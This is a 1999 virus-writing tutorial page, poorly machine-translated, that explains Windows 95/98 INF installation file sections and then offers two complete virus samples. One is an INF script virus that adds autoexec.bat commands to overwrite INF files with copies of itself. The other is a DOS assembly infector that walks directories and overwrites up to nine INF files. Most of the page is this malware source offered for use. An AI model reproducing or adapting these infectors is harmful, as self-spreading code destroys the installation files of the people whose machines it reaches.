<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="GENERATOR" content="Mozilla/4.7 [en] (Win98; I) [Netscape]">
   <meta name="Author" content="ULTRAS">
   <title>Infection INF file</title>
</head>
<body text="#000000" bgcolor="#FFFFFF">
<img SRC="inf.gif" ALT="inf.gif (3967 bytes)" height=22 width=262>
<br>&nbsp;
<p><font face="Verdana"><font size=-2>So infection inf of files, in this
clause I shall describe some methods and teams inf of files all that I
could find and that I have made.</font></font>
<p><font face="Verdana"><font size=-2>[ <font color="#FF0000">The description</font>
]</font></font>
<p><font face="Verdana"><font size=-2>The Inf-files represent instalation
files consisting of several sections. Each section is intended for performance
certain of a task.</font></font>
<p><font face="Verdana"><font size=-2>[ <font color="#FF0000">The brief
description of some teams</font> ]</font></font>
<p><font face="Verdana"><font size=-2>[<font color="#FF0000">Name</font>]
- the Square brackets are used designations of a beginning of the new unit.</font></font>
<p><font face="Verdana"><font size=-2>; - Comment in inf files</font></font>
<p><font face="Verdana"><font size=-2>Signature = $Chicago $ - Sets operational
system for inf of files.On the moment a spelling the code name Win95 was
the following: Chicago.</font></font>
<p><font face="Verdana"><font size=-2><font color="#0000FF">CopyFile</font>
- Contains the information necessary for copying of the specified fileor
files in the catalogue. You can give system the instruction(indication)
to copy a separate file. For this purpose before have of a file it is necessary
to include a symbol. Thus the file will be copied in the catalogue DefaultDestDir,
certain(determined) in section DestinationDir in inf files.</font></font>
<br>&nbsp;
<p><font face="Verdana"><font size=-2><font color="#0000FF">RenFile</font>
- Allows to rename specified a file.</font></font>
<p><font face="Verdana"><font size=-2><font color="#0000FF">DelFile</font>
- Allows to remove specified a file.</font></font>
<p><font face="Verdana"><font size=-2><font color="#0000FF">AddReg</font>
- Allows to specify turn-key or meaning(importance), which is required&nbsp;
to be added in the register.</font></font>
<p><font face="Verdana"><font size=-2><font color="#0000FF">DelReg</font>
- Allows to specify turn-key or meaning(importance), which are required
to be removed from the register.</font></font>
<p><font face="Verdana"><font size=-2><font color="#0000FF">UpdateAutoBat
</font>- In this section there are teams, which modify a file autoexec.bat.</font></font>
<p><font face="Verdana"><font size=-2><font color="#0000FF">DefaultDestDir</font>
- Allows to specify the catalogue - receiver.</font></font>
<p><font face="Verdana"><font size=-2><font color="#0000FF">Reboot aka
Restart</font> - Teams causing reboot systems or restart of the machine
after end of virus installation.</font></font>
<p><font face="Verdana"><font color="#FF0000"><font size=-2>UpdateAutoBat</font></font></font>
<br><font face="Verdana"><font size=-2>=-=-=-=-=-=-=</font></font>
<p><font face="Verdana"><font size=-2><font color="#0000FF">CmdDelete</font>
- Specifies command, which should be removed from a file autoexec.bat.
This line is processed before a line CmdAdd.</font></font>
<p><font face="Verdana"><font size=-2><font color="#0000FF">CmdAdd</font>
- Specifies a team, which is required to be added in a file autoexec.bat.</font></font>
<p><font face="Verdana"><font color="#FF0000"><font size=-2>DestinationDirs</font></font></font>
<br><font face="Verdana"><font size=-2>=-=-=-=-=-=-</font></font>
<p><font face="Verdana"><font size=-2>00 - in the current catalogue?</font></font>
<br><font face="Verdana"><font size=-2>01 - initial disk name:\way</font></font>
<br><font face="Verdana"><font size=-2>04 - catalogue backup?</font></font>
<br><font face="Verdana"><font size=-2>10 - catalogue Windows</font></font>
<br><font face="Verdana"><font size=-2>11 - catalogue System</font></font>
<br><font face="Verdana"><font size=-2>12 - catalogue Iosybsys</font></font>
<br><font face="Verdana"><font size=-2>13 - catalogue Command?</font></font>
<br><font face="Verdana"><font size=-2>14 - catalogue Control Panel</font></font>
<br><font face="Verdana"><font size=-2>15 - catalogue Printers</font></font>
<br><font face="Verdana"><font size=-2>16 - catalogue Workgroup?</font></font>
<br><font face="Verdana"><font size=-2>17 - catalogue Inf</font></font>
<br><font face="Verdana"><font size=-2>18 - catalogue Help</font></font>
<br><font face="Verdana"><font size=-2>20 - catalogue Fonts?</font></font>
<br><font face="Verdana"><font size=-2>21 - catalogue Viewers?</font></font>
<br><font face="Verdana"><font size=-2>22 - catalogue VMM32?</font></font>
<br><font face="Verdana"><font size=-2>26 - catalogue Winboot</font></font>
<br><font face="Verdana"><font size=-2>28 - catalogue Winboot host</font></font>
<br><font face="Verdana"><font size=-2>30 - root catalogue loading device</font></font>
<br><font face="Verdana"><font size=-2>32 - root catalogue with the former
version windows? (if is)</font></font>
<br><font face="Verdana"><font size=-2>33 - root catalogue with the former
version ms-dos? (if is)</font></font>
<p><font face="Verdana"><font color="#FF0000"><font size=-2>AddReg and
DelReg</font></font></font>
<br><font face="Verdana"><font size=-2>=-=-=-=-=-=-=-=-</font></font>
<p><font face="Verdana"><font size=-2>Section [Add Registry] allows to
add in the register keys and meanings (importance). Besides there is a
unessential opportunity to establish actual meaning(importance). A name
of the unit [add_registry section] should be given by an element AddReg
of the unit [ClassInstall] either [Install] or [DefaultInstall].</font></font>
<p><font face="Verdana"><font size=-2>Section [Delete Registry] is used
for removal(distance) from the register turn-keys and names of meanings(importance).</font></font>
<p><font face="Verdana"><font color="#FF0000"><font size=-2>CopyFiles</font></font></font>
<br><font face="Verdana"><font size=-2>=-=-=-=-</font></font>
<p><font face="Verdana"><font size=-2>For an element CopyFiles the following
syntax is used. Parameters sourcefile and temporaryFile.</font></font>
<p><font face="Verdana"><font color="#FF0000"><font size=-2>RenFiles</font></font></font>
<br><font face="Verdana"><font size=-2>=-==-=</font></font>
<p><font face="Verdana"><font size=-2>For an element CopyFiles the following
syntax is used. Parameters newfile and oldfile the inclusion of any quantity(amount)
of elements is supposed.</font></font>
<p><font face="Verdana"><font color="#FF0000"><font size=-2>DelFiles</font></font></font>
<br><font face="Verdana"><font size=-2>=-=-=-=</font></font>
<p><font face="Verdana"><font size=-2>For an element CopyFiles the following
syntax is used. Parameters filename. Set of examples you can to find in
windows/inf the catalogue.</font></font>
<p><font face="Verdana"><font color="#FF0000"><font size=-2>Examples</font></font></font>
<br><font face="Verdana"><font size=-2>~~~~~~</font></font>
<p><font face="Verdana"><font size=-2>So we shall proceed(pass) to a spelling
of viruses for inf of files. 2 examples inf of viruses first on inf scripts,
second on asm are below described. At once I want to tell what to write
parasite inf a virus in general or nearly so not probably.</font></font>
<p><font face="Verdana"><font size=-2>-[<font color="#FF0000">f0jar.inf</font>]-
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8</font></font>
<p><font face="Verdana"><font size=-2>;The description</font></font>
<br><font face="Verdana"><font size=-2>;***************</font></font>
<p><font face="Verdana"><font size=-2>;Script-virus infecting an install
INF-file Windows. At installation of the</font></font>
<br><font face="Verdana"><font size=-2>;software by a standard way Windows
searches a INF-file, processes it(him) and</font></font>
<br><font face="Verdana"><font size=-2>;carries out the script-instructions.
Virus script at activization creates in</font></font>
<br><font face="Verdana"><font size=-2>;the root catalogue of a disk About
a file with a name f0jer.sys, copies in him</font></font>
<br><font face="Verdana"><font size=-2>;(it) the file - carrier (infected
INF-file) and finishes in the end of a file</font></font>
<br><font face="Verdana"><font size=-2>;AUTOEXEC.BAT some teams DOS. These
teams at next reboot Windows search in the</font></font>
<br><font face="Verdana"><font size=-2>;catalogue windows\system and on
the current disk for a *.INF-file and enters</font></font>
<br><font face="Verdana"><font size=-2>;the name instead of him(it).</font></font>
<p><font face="Verdana"><font size=-2>;Code of a virus</font></font>
<br><font face="Verdana"><font size=-2>;***************</font></font>
<p><font face="Verdana"><font size=-2>; f0jar by ULTRAS</font></font>
<br><font face="Verdana"><font size=-2>[version]</font></font>
<br><font face="Verdana"><font size=-2>signature = "$CHICAGO$"&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
; signature win95/98</font></font>
<br><font face="Verdana"><font size=-2>SetupClass=BASE</font></font>
<p><font face="Verdana"><font size=-2>[DefaultInstall]</font></font>
<br><font face="Verdana"><font size=-2>CopyFiles = Ultra.File ; copying
of files in section Ultra.file</font></font>
<br><font face="Verdana"><font size=-2>UpdateAutoBat = Patch.It&nbsp;&nbsp;&nbsp;&nbsp;
; record in autoexec.bat in section Patch.it</font></font>
<p><font face="Verdana"><font size=-2>[Patch.it]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
; let's remove teams in autoexec.bat</font></font>
<br><font face="Verdana"><font size=-2>CmdDelete = "@ctty", "nul"</font></font>
<br><font face="Verdana"><font size=-2>CmdDelete = "for", " %% b in (%windir%\system\*.inf
*.inf) do copy f0jer.sys %% b "</font></font>
<br><font face="Verdana"><font size=-2>CmdDelete = "ctty", "con"</font></font>
<br><font face="Verdana"><font size=-2>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
; let's write down teams in autoexec.bat</font></font>
<br><font face="Verdana"><font size=-2>CmdAdd = "@ctty", "nul"</font></font>
<br><font face="Verdana"><font size=-2>CmdAdd = "for", " %% b in (%windir%\system\*.inf
*.inf) do copy f0jer.sys %% b "</font></font>
<br><font face="Verdana"><font size=-2>CmdAdd = "ctty", "con"</font></font>
<p><font face="Verdana"><font size=-2>[DestinationDirs]</font></font>
<br><font face="Verdana"><font size=-2>DefaultDestDir = 30&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
; the root catalogue loading device</font></font>
<p><font face="Verdana"><font size=-2>[SourceDisksNames]</font></font>
<br><font face="Verdana"><font size=-2>1 = "ULTRAS", " ", 1</font></font>
<p><font face="Verdana"><font size=-2>[ Ultra. File]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
; we copy from ultras.inf in f0jer.inf</font></font>
<br><font face="Verdana"><font size=-2>f0jer.sys, ultras.inf</font></font>
<p><font face="Verdana"><font size=-2>So example 2. Infection inf of files
on asm, the virus was written very quickly</font></font>
<br><font face="Verdana"><font size=-2>so it(he) can contain mistakes.</font></font>
<p><font face="Verdana"><font size=-2>-[<font color="#FF0000">z0x.asm</font>]-
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8</font></font>
<br>&nbsp;
<p><font face="Verdana"><font size=-2>; Z0x.INF - Exemple INF infector
on asm</font></font>
<br><font face="Verdana"><font size=-2>; ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~</font></font>
<br><font face="Verdana"><font size=-2>; this virus infects install INF-files
Windows. At installation; the software</font></font>
<br><font face="Verdana"><font size=-2>; by a standard way Windows searches
a INF-file, processes it(him) and carries</font></font>
<br><font face="Verdana"><font size=-2>; out the script-instructions. Virus
script at of activization creates in the</font></font>
<br><font face="Verdana"><font size=-2>; root catalogue of a disk About
a file with a name z0x.sys, copies in him(it)</font></font>
<br><font face="Verdana"><font size=-2>; the file - carrier (infected INF-file)
and finishes in the</font></font>
<br><font face="Verdana"><font size=-2>; end a file AUTOEXEC.BAT some teams
DOS. These teams at loading Windows rename</font></font>
<br><font face="Verdana"><font size=-2>; a file z0x.sys in z0x.com also
start it(him). A file B.COM is carried out as</font></font>
<br><font face="Verdana"><font size=-2>; an ordinary COM-file.</font></font>
<p><font face="Verdana"><font size=-2>.model tiny</font></font>
<br><font face="Verdana"><font size=-2>.code</font></font>
<br><font face="Verdana"><font size=-2>org 100h</font></font>
<br><font face="Verdana"><font size=-2>start:</font></font>
<br><font face="Verdana"><font size=-2>db ';', 0 ; infection marker</font></font>
<br><font face="Verdana"><font size=-2>jmp v_start ; jmp virus start</font></font>
<br><font face="Verdana"><font size=-2>idz db 'U', 0 ; infection marker</font></font>
<br><font face="Verdana"><font size=-2>db 13,10</font></font>
<br><font face="Verdana"><font size=-2>db 13,10</font></font>
<br><font face="Verdana"><font size=-2>db '[version]',13,10</font></font>
<br><font face="Verdana"><font size=-2>db 'signature="$CHICAGO$"',13,10
;signature win95/98</font></font>
<br><font face="Verdana"><font size=-2>db 'SetupClass=BASE',13,10</font></font>
<br><font face="Verdana"><font size=-2>db 13,10</font></font>
<br><font face="Verdana"><font size=-2>db '[DefaultInstall]',13,10</font></font>
<br><font face="Verdana"><font size=-2>db 'CopyFiles = Ultra.File',13,10
; copying of files in section Ultra.file</font></font>
<br><font face="Verdana"><font size=-2>db 'UpdateAutoBat = Patch.It',13,10
; record in autoexec.bat in section Patch.it</font></font>
<br><font face="Verdana"><font size=-2>db 13,10</font></font>
<br><font face="Verdana"><font size=-2>db '[Patch.it]',13,10</font></font>
<br><font face="Verdana"><font size=-2>db 'CmdDelete = "@ctty", "null"',13,10</font></font>
<br><font face="Verdana"><font size=-2>db 'CmdDelete = "ren", "z0x.sys
z0x.com"',13,10</font></font>
<br><font face="Verdana"><font size=-2>db 'CmdDelete = "@", "z0x.com"',13,10</font></font>
<br><font face="Verdana"><font size=-2>db 'CmdDelete = "ctty", "con"',13,10</font></font>
<br><font face="Verdana"><font size=-2>db 13,10</font></font>
<br><font face="Verdana"><font size=-2>db 'CmdAdd = "@ctty", "null"',13,10</font></font>
<br><font face="Verdana"><font size=-2>db 'CmdAdd = "ren", "z0x.sys z0x.com"',13,10</font></font>
<br><font face="Verdana"><font size=-2>db 'CmdAdd = "@", "z0x.com"',13,10</font></font>
<br><font face="Verdana"><font size=-2>db 'CmdAdd = "ctty", "con"',13,10</font></font>
<br><font face="Verdana"><font size=-2>db 13,10</font></font>
<br><font face="Verdana"><font size=-2>db '[DestinationDirs]',13,10</font></font>
<br><font face="Verdana"><font size=-2>db 'DefaultDestDir = 30',13,10&nbsp;&nbsp;&nbsp;
; The root catalogue of the loading device</font></font>
<br><font face="Verdana"><font size=-2>db 13,10</font></font>
<br><font face="Verdana"><font size=-2>db '[SourceDisksNames]',13,10</font></font>
<br><font face="Verdana"><font size=-2>db '1="ULTRAS","",1',13,10</font></font>
<br><font face="Verdana"><font size=-2>db 13,10</font></font>
<br><font face="Verdana"><font size=-2>db '[Ultra.File]',13,10</font></font>
<br><font face="Verdana"><font size=-2>db 'z0x.sys, ultras.inf',13,10 ;
We copy from ultras.inf in z0x.sys</font></font>
<br><font face="Verdana"><font size=-2>db 13,10</font></font>
<br><font face="Verdana"><font size=-2>db ";"</font></font>
<br><font face="Verdana"><font size=-2>v_start:</font></font>
<br><font face="Verdana"><font size=-2>mov max_inf,0</font></font>
<br><font face="Verdana"><font size=-2>get_dir:</font></font>
<br><font face="Verdana"><font size=-2>mov ah,47h</font></font>
<br><font face="Verdana"><font size=-2>lea si,old_dir</font></font>
<br><font face="Verdana"><font size=-2>xor dl,dl</font></font>
<br><font face="Verdana"><font size=-2>int 21h</font></font>
<br><font face="Verdana"><font size=-2>find_:</font></font>
<br><font face="Verdana"><font size=-2>lea dx,filemask</font></font>
<br><font face="Verdana"><font size=-2>call find_file</font></font>
<br><font face="Verdana"><font size=-2>return:</font></font>
<br><font face="Verdana"><font size=-2>cmp max_inf,9</font></font>
<br><font face="Verdana"><font size=-2>jae quit</font></font>
<br><font face="Verdana"><font size=-2>mov ah,3bh</font></font>
<br><font face="Verdana"><font size=-2>lea dx,dot_dot</font></font>
<br><font face="Verdana"><font size=-2>int 21h</font></font>
<br><font face="Verdana"><font size=-2>jnc find_</font></font>
<br><font face="Verdana"><font size=-2>quit:</font></font>
<br><font face="Verdana"><font size=-2>mov ah,3bh</font></font>
<br><font face="Verdana"><font size=-2>lea dx,old_dir</font></font>
<br><font face="Verdana"><font size=-2>int 21h</font></font>
<br><font face="Verdana"><font size=-2>int 20h</font></font>
<br><font face="Verdana"><font size=-2>find_file:</font></font>
<br><font face="Verdana"><font size=-2>mov ah,4eh</font></font>
<br><font face="Verdana"><font size=-2>mov cx,7</font></font>
<br><font face="Verdana"><font size=-2>find_it:</font></font>
<br><font face="Verdana"><font size=-2>int 21h</font></font>
<br><font face="Verdana"><font size=-2>jc return</font></font>
<br><font face="Verdana"><font size=-2>mov dx,9eh</font></font>
<br><font face="Verdana"><font size=-2>get_attributes:</font></font>
<br><font face="Verdana"><font size=-2>mov ax,4300h</font></font>
<br><font face="Verdana"><font size=-2>int 21h</font></font>
<br><font face="Verdana"><font size=-2>mov file_at,cx</font></font>
<br><font face="Verdana"><font size=-2>set_attributes:</font></font>
<br><font face="Verdana"><font size=-2>mov ax,4301h</font></font>
<br><font face="Verdana"><font size=-2>xor cx,cx</font></font>
<br><font face="Verdana"><font size=-2>int 21h</font></font>
<br><font face="Verdana"><font size=-2>open_file:</font></font>
<br><font face="Verdana"><font size=-2>mov ax,3d02h</font></font>
<br><font face="Verdana"><font size=-2>int 21h</font></font>
<br><font face="Verdana"><font size=-2>xchg bx,ax</font></font>
<br><font face="Verdana"><font size=-2>get_time_date:</font></font>
<br><font face="Verdana"><font size=-2>mov ax,5700h</font></font>
<br><font face="Verdana"><font size=-2>int 21h</font></font>
<br><font face="Verdana"><font size=-2>push cx</font></font>
<br><font face="Verdana"><font size=-2>push dx</font></font>
<br><font face="Verdana"><font size=-2>check:</font></font>
<br><font face="Verdana"><font size=-2>mov ah,3fh</font></font>
<br><font face="Verdana"><font size=-2>lea dx,buff</font></font>
<br><font face="Verdana"><font size=-2>mov cx,4</font></font>
<br><font face="Verdana"><font size=-2>int 21h</font></font>
<br><font face="Verdana"><font size=-2>cmp byte ptr [buff+5],'U'</font></font>
<br><font face="Verdana"><font size=-2>je close_file</font></font>
<br><font face="Verdana"><font size=-2>mov ax,4200h</font></font>
<br><font face="Verdana"><font size=-2>xor cx,cx</font></font>
<br><font face="Verdana"><font size=-2>xor dx,dx</font></font>
<br><font face="Verdana"><font size=-2>int 21h</font></font>
<br><font face="Verdana"><font size=-2>write_virus:</font></font>
<br><font face="Verdana"><font size=-2>mov ah,40h</font></font>
<br><font face="Verdana"><font size=-2>mov cx,_end-start</font></font>
<br><font face="Verdana"><font size=-2>lea dx,start</font></font>
<br><font face="Verdana"><font size=-2>int 21h</font></font>
<br><font face="Verdana"><font size=-2>inc max_inf</font></font>
<br><font face="Verdana"><font size=-2>restore_date_time:</font></font>
<br><font face="Verdana"><font size=-2>mov ax,5701h</font></font>
<br><font face="Verdana"><font size=-2>pop dx</font></font>
<br><font face="Verdana"><font size=-2>pop cx</font></font>
<br><font face="Verdana"><font size=-2>int 21h</font></font>
<br><font face="Verdana"><font size=-2>close_file:</font></font>
<br><font face="Verdana"><font size=-2>mov ah,3eh</font></font>
<br><font face="Verdana"><font size=-2>int 21h</font></font>
<br><font face="Verdana"><font size=-2>mov cx,file_at</font></font>
<br><font face="Verdana"><font size=-2>mov dx,9eh</font></font>
<br><font face="Verdana"><font size=-2>mov ax,4301h</font></font>
<br><font face="Verdana"><font size=-2>int 21h</font></font>
<br><font face="Verdana"><font size=-2>cmp max_inf,9</font></font>
<br><font face="Verdana"><font size=-2>jne find_next</font></font>
<br><font face="Verdana"><font size=-2>jmp quit</font></font>
<br><font face="Verdana"><font size=-2>find_next:</font></font>
<br><font face="Verdana"><font size=-2>mov ah,4fh</font></font>
<br><font face="Verdana"><font size=-2>jmp find_it</font></font>
<br><font face="Verdana"><font size=-2>filemask db '*.inf',0</font></font>
<br><font face="Verdana"><font size=-2>dot_dot db '..',0</font></font>
<br><font face="Verdana"><font size=-2>virus_name db 'Z0x by [U]',0</font></font>
<br><font face="Verdana"><font size=-2>virz equ _end-offset start</font></font>
<br><font face="Verdana"><font size=-2>_end:</font></font>
<br><font face="Verdana"><font size=-2>max_inf db ?</font></font>
<br><font face="Verdana"><font size=-2>file_at dw ?</font></font>
<br><font face="Verdana"><font size=-2>buff db 6 dup(?)</font></font>
<br><font face="Verdana"><font size=-2>old_dir db 64 dup(?)</font></font>
<br><font face="Verdana"><font size=-2>end start</font></font>
<p><font face="Verdana"><font size=-2>;ULTRAS/MATRiX 1999</font></font>
</body>
</html>
